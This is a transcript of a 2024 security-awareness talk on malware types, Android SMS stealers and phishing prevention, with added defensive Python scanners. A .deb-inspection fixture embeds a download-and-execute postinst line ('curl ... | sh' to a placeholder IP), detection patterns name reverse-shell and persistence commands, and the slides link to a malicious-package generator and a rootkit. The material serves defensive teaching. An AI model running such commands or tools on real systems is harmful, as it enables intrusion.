
UniKL 2024 - Phishing Security Awareness: Malware

Fatah
January 26, 2024


Transcript

1. About Fatah Hashim (发达奇拉)
• Fat | 发达奇拉 | x86fatah
• Specializing in malware research & analysis, focusing on cross-platform and Windows analysis, with an interest in reverse engineering.
• Blogging at https://www.cookiesec.blog/
• Contact me on https://www.linkedin.com/in/fatah-iix/
2. Disclaimer
The views and opinions expressed in this content are my own and do not necessarily reflect the views and opinions of any company or organization that I am affiliated with.
3. Table of Contents
❑ Introduction to Malware
❑ Malware Platforms
❑ Purpose
❑ Initial Access
❑ Types of Malware
❑ Demonstration
❑ Prevention
❑ Wrap up
❑ Resources for further study
4. Introduction to Malware
❑ Malware is short for malicious software
❑ Think of it as real-world black magic
❑ Software designed to cause damage or perform other unwanted actions on computer systems
❑ These programs perform a variety of functions, including stealing, encrypting or deleting sensitive data, and monitoring a user's computer activity without their permission
❑ Common examples of malware include viruses, worms, trojan horses and spyware
5. Malware Platform – Windows
❑ Critical infrastructure runs Windows
❑ Vulnerability landscape and legacy infrastructure
❑ Legacy code and compatibility: a long history with a vast legacy codebase and backward-compatibility requirements
❑ For threat actors (TA): easy to code for, with lots of resources and research available
❑ Generally true in the historical context, but it is important to acknowledge the ongoing improvements in Windows security; no platform is entirely immune to threats.
6. Malware Platform – Linux
❑ The Linux operating system offers a strong security baseline, but it can still be targeted by attackers and their malicious software
❑ ELF (Executable and Linkable Format) malware
❑ Fake package resources: fake .deb, fake .rpm, fake .ko (kernel module), etc.
❑ Example TA techniques:
  ❑ https://github.com/mthbernardes/Derbie -> generates a malicious .deb
  ❑ https://github.com/m0nad/Diamorphine/tree/master -> LKM rootkit for Linux kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)
❑ ELF samples: https://bazaar.abuse.ch/browse/tag/elf/
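A malicious .deb works because dpkg runs the package's maintainer scripts (preinst, postinst, prerm, postrm) as root while installing it, so a "fake deb" does not need an exploit at all. The example below is added here and is not code from the deck or from Derbie. It builds a small constructed .deb in memory with a hostile postinst, then performs the check a practitioner should run on any package obtained outside the distribution's repositories: pull the maintainer scripts out of the archive and look for download-and-execute or persistence indicators before `dpkg -i` ever sees it. The .deb layout (an `ar` archive holding debian-binary, control.tar.* and data.tar.*) is the standard format; the indicator list is an assumption for illustration and should be tuned to your environment.

```python
"""Inspect maintainer scripts inside a .deb before installing it.

Added example, not from the deck or from Derbie. A .deb is an `ar` archive
holding debian-binary, control.tar.* and data.tar.*; dpkg runs the
preinst/postinst/prerm/postrm scripts from control.tar.* as root.
"""
from __future__ import annotations

import io
import re
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Assumed indicator list for illustration: download-and-execute, encoded
# payloads, reverse shells and persistence. Tune to your environment.
INDICATORS = {
    "download": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b"),
    "encoded_payload": re.compile(r"\bbase64\b"),
    "reverse_shell": re.compile(r"/dev/tcp/|\bnc\b.*-e\b"),
    "persistence": re.compile(r"\bcrontab\b|/etc/cron|\.bashrc|systemctl\s+enable"),
}


def _ar_member(name: str, data: bytes) -> bytes:
    """Encode one member in the classic 60-byte-header ar format."""
    header = (
        name.ljust(16) + "0".ljust(12) + "0".ljust(6) + "0".ljust(6)
        + "100644".ljust(8) + str(len(data)).ljust(10) + "`\n"
    ).encode()
    return header + data + (b"\n" if len(data) % 2 else b"")  # pad to even length


def _tar_gz(files: dict[str, tuple[str, int]]) -> bytes:
    """Build a gzip'd tar from {name: (content, mode)} entirely in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, (content, mode) in files.items():
            raw = content.encode()
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(raw), mode
            tar.addfile(info, io.BytesIO(raw))
    return buf.getvalue()


def build_deb(package: str, scripts: dict[str, str]) -> bytes:
    """Constructed test fixture: a minimal .deb carrying the given maintainer scripts."""
    control = (f"Package: {package}\nVersion: 1.0\nArchitecture: all\n"
               "Maintainer: fixture\nDescription: fixture\n")
    files = {"control": (control, 0o644)}
    files.update({n: (body, 0o755) for n, body in scripts.items()})
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _tar_gz(files))
            + _ar_member("data.tar.gz", _tar_gz({})))


def ar_members(blob: bytes) -> dict[str, bytes]:
    """Parse an ar archive into {member_name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive (bad magic)")
    members, pos = {}, 8
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        if header[58:60] != b"`\n":
            raise ValueError(f"corrupt ar header at offset {pos}")
        name = header[:16].decode().rstrip().rstrip("/")  # dpkg may write "name/"
        size = int(header[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members start on even offsets
    return members


def maintainer_scripts(deb: bytes) -> dict[str, str]:
    """Return {script_name: source} for every maintainer script in the .deb."""
    members = ar_members(deb)
    control_name = next((n for n in members if n.startswith("control.tar")), None)
    if control_name is None:
        raise ValueError("no control.tar.* member")
    if control_name.endswith(".zst"):
        raise NotImplementedError("zstd control.tar needs an external decompressor")
    found = {}
    with tarfile.open(fileobj=io.BytesIO(members[control_name]), mode="r:*") as tar:
        for entry in tar.getmembers():
            base = entry.name.rsplit("/", 1)[-1]
            if entry.isfile() and base in MAINTAINER_SCRIPTS:
                found[base] = tar.extractfile(entry).read().decode(errors="replace")
    return found


def flag_suspicious(scripts: dict[str, str]) -> list[tuple[str, str]]:
    """Return sorted (script, indicator) pairs; an empty list means nothing matched."""
    return sorted((name, tag) for name, body in scripts.items()
                  for tag, pattern in INDICATORS.items() if pattern.search(body))


if __name__ == "__main__":
    # Constructed sample: a "hardening tool" whose postinst pulls and runs a script.
    evil = build_deb("hardening-tool", {
        "postinst": "#!/bin/sh\nset -e\ncurl -fsSL http://203.0.113.5/x.sh | sh\n",
    })
    for script, indicator in flag_suspicious(maintainer_scripts(evil)):
        print(f"SUSPICIOUS: {script}: {indicator}")
```

On a real file, `maintainer_scripts(open("pkg.deb", "rb").read())` is the whole check; `dpkg-deb --info pkg.deb postinst` does the same extraction on a Debian host, but a standalone parser lets you triage a sample on a workstation where you would never want to invoke dpkg on it.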
7. Malware Info – Mobile
❑ Specifically designed to target mobile devices, such as smartphones and tablets, with the goal of gaining access to private data
❑ Google and Apple invest a lot in security research, but that is not enough!
❑ As has been shown time after time, malware is still able to bypass app-store security (Google Play, App Store)
❑ Security vulnerabilities are discovered daily, and if your device is not patched, you are vulnerable!
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/
8. Malware Platform – Android 1/2
❑ Malware abuses Android's Accessibility Service to take over the phone, displaying a request prompt that lets it add itself to the device administrator list
❑ Once the takeover is complete, the malware can send an SMS/WhatsApp message containing specific text to any number, extract text messages and send them back to the C2 server, open links, and steal data such as phone call information
https://ringgitplus.com/en/blog/personal-finance-news/latest-phishing-scam-hides-within-an-app-and-is-disturbingly-sophisticated.html
9. Malware Platform – Android 2/2
❑ Cybersecurity Alert: Malware scams are on the rise (https://www.thestar.com.my/starpicks/2023/12/29/cybersecurity-alert-malware-scams-are-on-the-rise)
❑ SMS stealer APK using a "Kahwin" (wedding) theme targeting Malaysians: the "Kad Kahwin Digital" APK (https://notes.netbytesec.com/2023/06/kahwin-sms-stealer-target-Malaysia.html)
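Both Android slides describe the same pattern: an APK delivered outside the store, which then asks for an accessibility service and device-administrator rights so it can read and send SMS. A quick triage for a phone you are handed, added here as an example and not from the deck, is to cross-check which packages were sideloaded against which accessibility services are switched on. It parses the text of `adb shell pm list packages -3 -i` (third-party packages with their installer) and `adb shell settings get secure enabled_accessibility_services`; the sample output embedded below is constructed, the exact whitespace of the `pm` output is an assumption (the regex is lenient), and the allowlist of legitimate services is an assumption you should replace with your own.

```python
"""Triage Android accessibility-service abuse from adb output.

Added example, not from the deck. Input is the captured text of
    adb shell pm list packages -3 -i
    adb shell settings get secure enabled_accessibility_services
The samples below are constructed; the exact whitespace of the pm output
is an assumption, so the regex is lenient.
"""
from __future__ import annotations

import re

PLAY_STORE = "com.android.vending"

# Assumed allowlist: accessibility services you expect to be on. Replace with your own.
KNOWN_GOOD_SERVICES = {
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService",
}

_PKG_LINE = re.compile(r"^package:(\S+)\s+installer=(\S+)\s*$")

# Constructed sample output (not real device data).
SAMPLE_PM = """\
package:com.whatsapp  installer=com.android.vending
package:com.example.kadkahwin  installer=null
package:com.example.bank  installer=com.android.vending
"""
SAMPLE_ACCESSIBILITY = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService"
    ":com.example.kadkahwin/.AccessService"
)


def parse_installers(pm_output: str) -> dict[str, str | None]:
    """Map package name -> installer package (None when sideloaded, i.e. installer=null)."""
    result: dict[str, str | None] = {}
    for line in pm_output.splitlines():
        m = _PKG_LINE.match(line.strip())
        if m:
            pkg, installer = m.groups()
            result[pkg] = None if installer == "null" else installer
    return result


def parse_accessibility(setting_value: str) -> list[tuple[str, str]]:
    """Split the colon-separated enabled_accessibility_services value into (pkg, service)."""
    value = setting_value.strip()
    if not value or value == "null":
        return []
    services = []
    for item in value.split(":"):
        pkg, _, svc = item.partition("/")
        if svc.startswith("."):  # shorthand: service class relative to the package
            svc = pkg + svc
        services.append((pkg, svc))
    return services


def triage(pm_output: str, setting_value: str) -> list[dict]:
    """Flag every enabled accessibility service that is not on the allowlist,
    noting whether its package was sideloaded or came from a non-Play installer."""
    installers = parse_installers(pm_output)
    findings = []
    for pkg, svc in parse_accessibility(setting_value):
        if f"{pkg}/{svc}" in KNOWN_GOOD_SERVICES:
            continue
        installer = installers.get(pkg)
        reasons = ["accessibility service enabled and not on the allowlist"]
        if pkg not in installers:
            reasons.append("not listed as a third-party package (system or pre-installed)")
        elif installer is None:
            reasons.append("sideloaded (installer=null)")
        elif installer != PLAY_STORE:
            reasons.append(f"installed by {installer}, not the Play Store")
        findings.append({"package": pkg, "service": svc,
                         "installer": installer, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PM, SAMPLE_ACCESSIBILITY):
        print(f["package"], f["service"], "->", "; ".join(f["reasons"]))
```

A sideloaded package with an accessibility service switched on is exactly the footprint of the SMS stealer on the slide; the follow-up is `adb shell dumpsys package <pkg>` to read its requested permissions (RECEIVE_SMS, SEND_SMS) and to decide whether to pull the APK for analysis.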
10. Purpose
❑ To hurt others and make money
❑ Financial: stealing, encrypting, or deleting sensitive data
❑ Altering or hijacking core computing functions
❑ Monitoring users' computer activity without their permission
❑ To steal personal, financial, or business information from individuals and governments
https://shorturl.at/lnzI1
https://www.kaspersky.com/blog/2ch-webcam-hack/11961/
11. Initial Access
❑ Delivered physically to a system through USB flash drives or external hard drives
❑ Spam e-mails and phishing attacks
❑ Bundled with other software (cracks)
❑ Accessing hacked or compromised web pages
12. Types of Malware - Virus
❑ When executed, replicates itself by modifying other computer programs and inserting its own code into those programs
❑ Deletes existing files, corrupts running applications
❑ Melissa virus (1999), targeted Microsoft Word and Outlook-based systems
https://cyberhoot.com/cybrary/melissa-virus/
13. Types of Malware - Trojan
❑ Named after the mythical Greek warriors hidden within the Trojan Horse; malicious software disguised as legitimate programs
❑ Trojans act as wolves in sheep's clothing, luring users into unsuspecting interaction before unleashing their payload
❑ Data theft, system hijacking, or surveillance
https://etc.usf.edu/clipart/19300/19346/trojanhorse_19346.htm
14. Types of Malware - Worm
❑ Malicious software that can replicate rapidly and spread across devices within a network
❑ Self-contained, autonomous agents that exploit vulnerabilities in operating systems and network protocols to burrow into new systems like digital parasites
❑ Disrupting systems, stealing data, and more
https://www.researchgate.net/figure/Operation-of-virus-and-worm_fig1_268040374
15. Types of Malware - Ransomware
❑ Malicious software designed to block access to a computer system (typically by encrypting its files) until a sum of money is paid
❑ Payment is demanded in virtual currency, such as Bitcoin; iTunes and Amazon gift cards have also been demanded
❑ The motive is almost always money
https://www.researchgate.net/figure/The-modus-operandi-of-a-ransomware-attack_fig1_374711715
16. Prevention
❑ Be wary of phishing emails with attachments or links
❑ Hover over links in the body of the email to check that the real URL matches what is displayed
❑ Be wary of suspicious text messages and emails: do not click on links or download attachments that you are not expecting
❑ Use only official apps: download apps from the official app stores; do not install from third-party websites
❑ Install and run anti-malware software and ensure you have the latest security updates
❑ Update software and operating systems with the latest vulnerability patches
❑ Remove legacy programs that are no longer supported
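The hover-over check above compares the link text a mail client shows with the href it actually points to. The following added example (not from the deck) automates that comparison over an HTML email body using only the Python standard library: it extracts every anchor, flags links whose visible text looks like a URL on one domain while the href goes to another, flags hosts written in IDNA punycode (`xn--`), a classic look-alike trick, and flags bare IP-address hosts. The sample message is constructed, and the "registrable domain" helper is a deliberate simplification (last two labels) rather than a public-suffix-list lookup.

```python
"""Compare displayed link text with real hrefs in an HTML email body.

Added example, not from the deck. Stdlib only; the sample message is constructed.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Visible text that a reader would take for a URL: optional scheme, a host with a TLD, optional path.
_LOOKS_LIKE_URL = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/?#].*)?$", re.I)
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample body: one mismatched link, one honest link, one punycode look-alike.
SAMPLE_EMAIL = """
<p>Your account is locked. <a href="http://secure-login.example-update.net/reset">https://www.mybank.com/reset</a></p>
<p>See the <a href="https://www.mybank.com/help">help centre</a>.</p>
<p>Verify at <a href="https://xn--mybnk-0ra.com/verify">mybank.com</a></p>
"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.links: list[tuple[str, str]] = []
        self._href: str | None = None
        self._text: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(html: str) -> list[tuple[str, str]]:
    parser = _AnchorCollector()
    parser.feed(html)
    return parser.links


def host_of(url: str) -> str:
    """Lower-cased hostname of a URL; a bare domain is treated as http://domain."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    return (parsed.hostname or "").lower()


def registrable_domain(host: str) -> str:
    """Last two labels. Simplification for the demo, not a public-suffix-list lookup."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def check_links(html: str) -> list[dict]:
    """Return one finding per suspicious anchor: {href, text, reasons}."""
    findings = []
    for href, text in extract_links(html):
        href_host = host_of(href)
        reasons = []
        m = _LOOKS_LIKE_URL.match(text)
        if m:
            shown_host = host_of(m.group(1))
            if registrable_domain(shown_host) != registrable_domain(href_host):
                reasons.append(f"text shows {shown_host} but href goes to {href_host}")
        if any(label.startswith("xn--") for label in href_host.split(".")):
            reasons.append("punycode (IDNA) host, possible look-alike domain")
        if _IPV4.match(href_host):
            reasons.append("link points at a bare IP address")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in check_links(SAMPLE_EMAIL):
        print(finding["href"], "<-", repr(finding["text"]))
        for reason in finding["reasons"]:
            print("   ", reason)
```

The honest "help centre" link produces no finding because its text is not URL-shaped; a mail gateway rule built on this logic should treat the domain-mismatch case as the strongest signal, since that is the one a user hovering over the link is being asked to notice.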
17. Wrap up
❑ Malware is a serious threat to individuals and organizations alike
❑ However, no security solution is perfect. Malware can still bypass security measures, especially if it is new or sophisticated
❑ But educating yourself about malware and how to avoid it will reduce the risk of becoming a victim